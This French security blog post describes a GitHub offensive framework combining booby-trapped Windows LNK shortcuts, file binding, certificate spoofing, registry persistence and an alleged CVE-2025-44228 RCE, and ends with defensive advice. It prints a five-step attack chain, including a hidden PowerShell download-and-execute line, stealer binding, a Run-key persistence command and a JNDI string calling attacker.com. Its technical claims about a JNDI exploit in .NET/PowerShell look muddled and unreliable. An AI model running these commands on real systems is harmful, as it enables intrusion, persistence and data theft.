💣 LNK + CVE-2025-44228 : un combo offensif redoutable livré sur GitHub

Un dépôt GitHub publié en juin 2025 révèle un combe offensif clé-en-main exploitant la faille CVE-2025-44228 via des raccourcis Windows LNK piégés. Ce framework, baptisé Lnk-Exploit-FileBinder-Certificate-Spoofer, combine persistance, évasion antivirus, injection de certificats et exécution à distance — une menace sérieuse pour les environnements Windows encore vulnérables.

Quand un dépôt GitHub ne se contente pas de « prouver un concept », mais fournit une suite offensive complète, c’est un signal fort. Le projet Caztemaz/Lnk‑Exploit‑FileBinder‑Certificate‑Spoofer‑Reg‑Doc‑Cve‑Rce en est l’illustration parfaite. Publié le 21 juin 2025 à 22:18:39 Z, ce framework ne joue pas dans la cour des scripts de pentesteurs débutants — il vise clairement l’exploitation automatisée, furtive et persistante des environnements Windows.

Ah oui le lien, ça peut vous aider :
Caztemaz / Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce
➡️ https://github.com/Caztemaz/Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce

🔍 Une suite offensive multi-étapes

Ce dépôt Visual Basic .NET compile un arsenal de fonctionnalités offensives réunies dans un seul outil, avec une ambition claire : bypasser les protections modernes tout en maximisant la persistance sur les machines ciblées.

Fonctionnalités principales :

1. 📎 LNK Exploit
   Génère des raccourcis Windows .lnk piégés, capables de lancer des payloads à l’ouverture via des commandes PowerShell ou autres exécutables, tout en masquant leur intention derrière des icônes et cibles légitimes.
2. 📦 File Binder
   Permet de fusionner plusieurs fichiers (binaire malveillant + leurre légitime) dans un exécutable unique. Très utilisé pour dissimuler un RAT ou un stealer dans un fichier d’apparence inoffensive.
3. 🔐 Certificate Spoofer
   Injecte des certificats forgés pour donner à l’exécutable l’apparence d’un fichier signé — trompant ainsi les utilisateurs et certains antivirus.
4. 🛠️ Persistance via registre
   Ajoute automatiquement une clé dans HKCU\Software\Microsoft\Windows\CurrentVersion\Run ou via des tâches planifiées pour relancer le payload à chaque démarrage.
5. 📄 Inclusion dans documents
   Injecte le payload dans des fichiers .docx, .rtf, .xls exploitant des macros ou champs DDE, pour une diffusion via phishing.
6. 🌐 RCE via CVE-2025‑44228
   Exploite une faille récente surnommée « Log4Shell-like », utilisant des raccourcis .lnk couplés à des appels réseau pour exécuter des commandes à distance silencieusement.
7. 🧙 Techniques FUD et anti-sandbox
   Contournement d’antivirus avec obfuscation, délai à l’exécution, détection d’environnement virtuel pour éviter les sandbox de sandboxie, Cuckoo ou VirusTotal.

🧪 Mise en œuvre technique (POC)

⚠️ Usage strictement réservé à des environnements de test ou dans le cadre d’un audit autorisé. L’outil est extrêmement dangereux et facilement déployable.

Pré-requis

• VM Windows 10/11 avec droits administrateur
• .NET Framework 4.8 installé
• Visual Studio (pour examiner le code)
• Python 3.x (optionnel pour servir un shell distant)
• Serveur HTTP à disposition (pour payloads distants)

Exemple de chaîne d’attaque

Étape 1 : Générer le LNK piégé

powershell
C:\> LnkGen.exe -icon "pdf.ico" -target "powershell.exe" -args "-exec bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.5/payload.ps1')"

Le LNK ouvre discrètement PowerShell et télécharge un script malveillant.

Étape 2 : Binder un outil légitime avec le stealer

bash
FileBinder.exe -f1 "notepad.exe" -f2 "Stealer.exe" -out "NoteLegit.exe"<br>

Étape 3 : Spoofer le certificat du binaire final

bash
CertSpoofer.exe -in "NoteLegit.exe" -cert "signed_dll_template.cer" -out "FinalPayload.exe"

Étape 4 : Ajout au registre (persistance)

powershell
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "OfficeUpdate" /t REG_SZ /d "C:\Users\Public\FinalPayload.exe" /f

Étape 5 : Déclenchement RCE via CVE-2025-44228

Dans le script PowerShell téléchargé :

powershell
Invoke-WebRequest -Uri "http://vuln-target.local/log?msg=${jndi:ldap://attacker.com/callback}"

Cela exploite une faille dans le composant de journalisation (équivalent Java/Log4Shell) vulnérable sur certaines applications .NET ou PowerShell.

💀 Pourquoi c’est problématique

Ce dépôt ne se contente pas d’implémenter des outils connus : il les orchestre de manière fluide, en un pipeline offensif qui :

• s’infiltre via un fichier anodin
• bypass les antivirus
• persiste sur la machine
• s’exécute à distance
• et s’auto-repique via des documents ou d’autres scripts

Le tout avec un README documenté, une licence MIT (donc redistribuable), et des captures d’écran pédagogiques.

🧩 En conclusion : un framework d’exploitation complet

Le dépôt Caztemaz/Lnk‑Exploit‑… n’est ni un Proof-of-Concept isolé, ni un simple binder ou un obfuscateur. Il s’agit d’une véritable boîte à outils offensive prête à l’emploi, ciblant directement les faiblesses humaines et techniques des environnements Windows.

Il s’inscrit dans la logique post-Log4Shell, où l’exploitation RCE est facilitée par la combinaison de techniques simples mais efficaces.

⚠️ Si vous administrez un parc Windows, ce genre de dépôt doit servir d’alerte : vos filtres d’extension, vos règles EDR, votre proxy, vos GPO et votre stratégie de mises à jour doivent être capables de contrer un tel outil.

🛡️ Bonnes pratiques recommandées :

• Bloquez l’exécution des .lnk provenant d’emplacements suspects (GPO, AppLocker).
• Désactivez les macros par défaut et bloquez les formats .rtf, .docm par défaut.
• Surveillez les requêtes vers des domaines inconnus ou internes via proxy ou IDS.
• Appliquez en priorité le correctif de la CVE-2025-44228 sur toutes les applications vulnérables.
• Activez le Windows Defender SmartScreen, même pour les fichiers locaux.
• Utilisez un EDR capable de détecter les injections PowerShell et les mouvements latéraux.

Partager cet article : Twitter LinkedIn WhatsApp

🖋️ Publié sur SecuSlice.com